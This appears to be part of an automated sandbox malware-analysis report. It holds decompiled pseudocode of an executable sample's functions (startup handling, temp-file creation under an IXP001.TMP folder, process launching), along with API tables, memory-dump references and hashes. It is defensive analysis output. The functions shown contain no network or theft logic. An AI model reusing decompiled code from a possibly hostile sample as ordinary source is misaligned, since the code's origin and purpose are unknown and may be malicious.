                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00322BFB(0x320000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0x3281e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0x3281f8;
                                                                                                                                                                                                                                            							if( *0x3281f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0x3281e4;
                                                                                                                                                                                                                                            							if( *0x3281e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0x3281e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E0032724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00326a60
                                                                                                                                                                                                                                            0x00326a6a
                                                                                                                                                                                                                                            0x00326a6c
                                                                                                                                                                                                                                            0x00326a71
                                                                                                                                                                                                                                            0x00326a78
                                                                                                                                                                                                                                            0x00326a7f
                                                                                                                                                                                                                                            0x00326a85
                                                                                                                                                                                                                                            0x00326a8e
                                                                                                                                                                                                                                            0x00326a91
                                                                                                                                                                                                                                            0x00326a93
                                                                                                                                                                                                                                            0x00326a9c
                                                                                                                                                                                                                                            0x00326aa2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326aa6
                                                                                                                                                                                                                                            0x00326ab4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326aa8
                                                                                                                                                                                                                                            0x00326aaa
                                                                                                                                                                                                                                            0x00326aab
                                                                                                                                                                                                                                            0x00326aab
                                                                                                                                                                                                                                            0x00326abf
                                                                                                                                                                                                                                            0x00326abf
                                                                                                                                                                                                                                            0x00326ac5
                                                                                                                                                                                                                                            0x00326ad1
                                                                                                                                                                                                                                            0x00326ad7
                                                                                                                                                                                                                                            0x00326b05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326ad9
                                                                                                                                                                                                                                            0x00326ad9
                                                                                                                                                                                                                                            0x00326ae9
                                                                                                                                                                                                                                            0x00326af0
                                                                                                                                                                                                                                            0x00326af2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326af4
                                                                                                                                                                                                                                            0x00326af4
                                                                                                                                                                                                                                            0x00326afb
                                                                                                                                                                                                                                            0x00326afb
                                                                                                                                                                                                                                            0x00326af2
                                                                                                                                                                                                                                            0x00326ac7
                                                                                                                                                                                                                                            0x00326ac7
                                                                                                                                                                                                                                            0x00326ac9
                                                                                                                                                                                                                                            0x00326b0b
                                                                                                                                                                                                                                            0x00326b0b
                                                                                                                                                                                                                                            0x00326b11
                                                                                                                                                                                                                                            0x00326b13
                                                                                                                                                                                                                                            0x00326b18
                                                                                                                                                                                                                                            0x00326b1d
                                                                                                                                                                                                                                            0x00326b24
                                                                                                                                                                                                                                            0x00326b24
                                                                                                                                                                                                                                            0x00326b30
                                                                                                                                                                                                                                            0x00326b39
                                                                                                                                                                                                                                            0x00326b39
                                                                                                                                                                                                                                            0x00326b3b
                                                                                                                                                                                                                                            0x00326b42
                                                                                                                                                                                                                                            0x00326b57
                                                                                                                                                                                                                                            0x00326b5f
                                                                                                                                                                                                                                            0x00326b65
                                                                                                                                                                                                                                            0x00326b65
                                                                                                                                                                                                                                            0x00326b67
                                                                                                                                                                                                                                            0x00326b6c
                                                                                                                                                                                                                                            0x00326b6e
                                                                                                                                                                                                                                            0x00326b71
                                                                                                                                                                                                                                            0x00326b74
                                                                                                                                                                                                                                            0x00326b74
                                                                                                                                                                                                                                            0x00326b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326b7d
                                                                                                                                                                                                                                            0x00326b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326b83
                                                                                                                                                                                                                                            0x00326b8c
                                                                                                                                                                                                                                            0x00326b8d
                                                                                                                                                                                                                                            0x00326b90
                                                                                                                                                                                                                                            0x00326b90
                                                                                                                                                                                                                                            0x00326b83
                                                                                                                                                                                                                                            0x00326b81
                                                                                                                                                                                                                                            0x00326b94
                                                                                                                                                                                                                                            0x00326b98
                                                                                                                                                                                                                                            0x00326ba2
                                                                                                                                                                                                                                            0x00326b9a
                                                                                                                                                                                                                                            0x00326b9a
                                                                                                                                                                                                                                            0x00326b9a
                                                                                                                                                                                                                                            0x00326ba3
                                                                                                                                                                                                                                            0x00326bab
                                                                                                                                                                                                                                            0x00326bb0
                                                                                                                                                                                                                                            0x00326bb5
                                                                                                                                                                                                                                            0x00326bbc
                                                                                                                                                                                                                                            0x00326bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326bbf
                                                                                                                                                                                                                                            0x00326c1e
                                                                                                                                                                                                                                            0x00326c25
                                                                                                                                                                                                                                            0x00326c27
                                                                                                                                                                                                                                            0x00326c2d
                                                                                                                                                                                                                                            0x00326c2d
                                                                                                                                                                                                                                            0x00326c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326bc5
                                                                                                                                                                                                                                            0x00326bc5
                                                                                                                                                                                                                                            0x00326bc8
                                                                                                                                                                                                                                            0x00326bcc
                                                                                                                                                                                                                                            0x00326bce
                                                                                                                                                                                                                                            0x00326bce
                                                                                                                                                                                                                                            0x00326bd1
                                                                                                                                                                                                                                            0x00326bd3
                                                                                                                                                                                                                                            0x00326bd3
                                                                                                                                                                                                                                            0x00326bd6
                                                                                                                                                                                                                                            0x00326bda
                                                                                                                                                                                                                                            0x00326be1
                                                                                                                                                                                                                                            0x00326be3
                                                                                                                                                                                                                                            0x00326be5
                                                                                                                                                                                                                                            0x00326be5
                                                                                                                                                                                                                                            0x00326be6
                                                                                                                                                                                                                                            0x00326be6
                                                                                                                                                                                                                                            0x00326be9
                                                                                                                                                                                                                                            0x00326bea
                                                                                                                                                                                                                                            0x00326bea
                                                                                                                                                                                                                                            0x00326b74
                                                                                                                                                                                                                                            0x00326c39
                                                                                                                                                                                                                                            0x00326c3e
                                                                                                                                                                                                                                            0x00326c3e
                                                                                                                                                                                                                                            0x00326abe
                                                                                                                                                                                                                                            0x00326abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00327182
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetCurrentProcessId.KERNEL32 ref: 00327191
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetCurrentThreadId.KERNEL32 ref: 0032719A
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetTickCount.KERNEL32 ref: 003271A3
                                                                                                                                                                                                                                              • Part of subcall function 00327155: QueryPerformanceCounter.KERNEL32(?), ref: 003271B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,003272B8,00000058), ref: 00326A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00326AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00326AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00326B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00326B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00326BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00326BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 658f9e26033eca89079af1b561a0547b5d892e7ac88ab1c3a25fbc7dae6703bb
                                                                                                                                                                                                                                            • Instruction ID: ceb96bc8ed2da9a38d97c39c4b035b0ed3915614b11ef78af406c654a78f5b6d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 658f9e26033eca89079af1b561a0547b5d892e7ac88ab1c3a25fbc7dae6703bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B741D171949774DFDB33AB69FD467AA77A8FF48720F25401EE841E7290CB7448428B90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 3258c8-3258d5 632 3258d8-3258dd 631->632 632->632 633 3258df-3258f1 LocalAlloc 632->633 634 3258f3-325901 call 3244b9 633->634 635 325919-325959 call 321680 call 32658a CreateFileA LocalFree 633->635 638 325906-325910 call 326285 634->638 635->638 644 32595b-32596c CloseHandle GetFileAttributesA 635->644 645 325912-325918 638->645 644->638 646 32596e-325970 644->646 646->638 647 325972-32597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E003258C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00321680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E0032658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x003258cd
                                                                                                                                                                                                                                            0x003258d1
                                                                                                                                                                                                                                            0x003258d3
                                                                                                                                                                                                                                            0x003258d5
                                                                                                                                                                                                                                            0x003258d8
                                                                                                                                                                                                                                            0x003258d8
                                                                                                                                                                                                                                            0x003258da
                                                                                                                                                                                                                                            0x003258db
                                                                                                                                                                                                                                            0x003258e1
                                                                                                                                                                                                                                            0x003258ed
                                                                                                                                                                                                                                            0x003258f1
                                                                                                                                                                                                                                            0x0032591e
                                                                                                                                                                                                                                            0x0032592c
                                                                                                                                                                                                                                            0x00325943
                                                                                                                                                                                                                                            0x0032594a
                                                                                                                                                                                                                                            0x0032594d
                                                                                                                                                                                                                                            0x00325953
                                                                                                                                                                                                                                            0x00325959
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032595b
                                                                                                                                                                                                                                            0x0032595c
                                                                                                                                                                                                                                            0x00325963
                                                                                                                                                                                                                                            0x0032596c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325972
                                                                                                                                                                                                                                            0x00325974
                                                                                                                                                                                                                                            0x0032597a
                                                                                                                                                                                                                                            0x0032597a
                                                                                                                                                                                                                                            0x0032596c
                                                                                                                                                                                                                                            0x003258f3
                                                                                                                                                                                                                                            0x00325901
                                                                                                                                                                                                                                            0x00325906
                                                                                                                                                                                                                                            0x0032590b
                                                                                                                                                                                                                                            0x00325910
                                                                                                                                                                                                                                            0x00325910
                                                                                                                                                                                                                                            0x00325918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003258E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00325534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-2825630923
                                                                                                                                                                                                                                            • Opcode ID: 1d31b020fe35da563f3475847a4aa48bf7182233f0848a8be99c0931ab058344
                                                                                                                                                                                                                                            • Instruction ID: d3542174635e9e5e9fa16afd82722009ec10960680d147d4393d4dcfc11f4015
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d31b020fe35da563f3475847a4aa48bf7182233f0848a8be99c0931ab058344
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70112232600630ABC7325F7ABC0DB9B7E9EDF46770F104619F50AD7281CB70994686A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 323fef-324010 676 324016-32403b CreateProcessA 675->676 677 32410a-32411a call 326ce0 675->677 678 324041-32406e WaitForSingleObject GetExitCodeProcess 676->678 679 3240c4-324101 call 326285 GetLastError FormatMessageA call 3244b9 676->679 682 324070-324077 678->682 683 324091 call 32411b 678->683 694 324106 679->694 682->683 687 324079-32407b 682->687 688 324096-3240b8 CloseHandle * 2 683->688 687->683 690 32407d-324089 687->690 692 3240ba-3240c0 688->692 693 324108 688->693 690->683 691 32408b 690->691 691->683 692->693 695 3240c2 692->695 693->677 694->693 695->694
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00323FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00326CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E003244B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0x328a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0x329a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0x329a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E0032411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0x329a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00323fef
                                                                                                                                                                                                                                            0x00323ffa
                                                                                                                                                                                                                                            0x00324001
                                                                                                                                                                                                                                            0x00324008
                                                                                                                                                                                                                                            0x0032400a
                                                                                                                                                                                                                                            0x0032400b
                                                                                                                                                                                                                                            0x00324010
                                                                                                                                                                                                                                            0x0032410a
                                                                                                                                                                                                                                            0x0032411a
                                                                                                                                                                                                                                            0x0032411a
                                                                                                                                                                                                                                            0x0032401c
                                                                                                                                                                                                                                            0x0032401d
                                                                                                                                                                                                                                            0x0032401e
                                                                                                                                                                                                                                            0x0032401f
                                                                                                                                                                                                                                            0x00324033
                                                                                                                                                                                                                                            0x0032403b
                                                                                                                                                                                                                                            0x003240ca
                                                                                                                                                                                                                                            0x003240e9
                                                                                                                                                                                                                                            0x003240f8
                                                                                                                                                                                                                                            0x00324101
                                                                                                                                                                                                                                            0x00324106
                                                                                                                                                                                                                                            0x00324106
                                                                                                                                                                                                                                            0x00324108
                                                                                                                                                                                                                                            0x00324108
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324108
                                                                                                                                                                                                                                            0x00324049
                                                                                                                                                                                                                                            0x0032405c
                                                                                                                                                                                                                                            0x00324062
                                                                                                                                                                                                                                            0x00324068
                                                                                                                                                                                                                                            0x0032406e
                                                                                                                                                                                                                                            0x00324070
                                                                                                                                                                                                                                            0x00324077
                                                                                                                                                                                                                                            0x0032407f
                                                                                                                                                                                                                                            0x00324089
                                                                                                                                                                                                                                            0x0032408b
                                                                                                                                                                                                                                            0x0032408b
                                                                                                                                                                                                                                            0x00324089
                                                                                                                                                                                                                                            0x00324077
                                                                                                                                                                                                                                            0x00324091
                                                                                                                                                                                                                                            0x0032409c
                                                                                                                                                                                                                                            0x003240a8
                                                                                                                                                                                                                                            0x003240b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003240c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003240c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 00324033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00324049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 0032405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0032409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003240A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003240DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003240E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 0d25bda8d7ea5ad0f720b0fe5be713140e66aa83483ef0f1011f33b33a9dc3bc
                                                                                                                                                                                                                                            • Instruction ID: 97b35076559baa8d20a73aac4c364641e78ba8cfbee92c65d7b461fe1c61b08b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d25bda8d7ea5ad0f720b0fe5be713140e66aa83483ef0f1011f33b33a9dc3bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3631D631640228ABEB339F65EC49FABB77CEB94710F10416DF905D5160C6305C92CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

